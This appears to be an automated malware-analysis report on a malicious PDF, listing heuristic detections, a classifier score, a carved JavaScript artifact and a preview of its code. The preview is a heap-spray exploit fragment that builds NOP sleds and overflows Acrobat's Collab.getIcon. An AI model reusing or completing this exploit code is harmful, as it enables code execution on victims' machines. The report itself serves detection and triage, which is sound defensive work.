MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The JavaScript stream, named 'javascript_obj0007_000.js', appears to be obfuscated, as suggested by the PDF_UNESCAPE heuristic. The document body contains repetitive strings and what appears to be shellcode padding, further suggesting an exploit attempt. The primary intent seems to be the execution of malicious JavaScript, likely to download and execute a second-stage payload.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
nopblock = unescape("%u9090%u9090"); headersize = 16; -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x297 | 600 bytes |
SHA-256: 1362c40e9814be17249f1b3992618d52f7a404a21c476ddc875ea3d1d33ce22e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
while (ggg.length < 0x100)
ggg += ggg;
ggg += sss + ppp;
nopblock = unescape("%u9090%u9090");
headersize = 16;
acl = headersize + ggg.length;
while (nopblock.length < acl)
nopblock += nopblock;
fillblock = nopblock.substring(0, acl);
block = nopblock.substring(0, nopblock.length - acl);
while(block.length + acl < 0x26000)
block = block + block + fillblock;
memory = new Array();
for (i=0;i<1024;i++)
memory[i] = block + ggg;
var buffer = unescape("%10%10%10%1f");
while(buffer.length < 0x6000)
buffer += buffer;
var ddd = app.doc.Collab
ddd.getIcon( buffer+ 'aaaaD.BBBBBBBB');
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.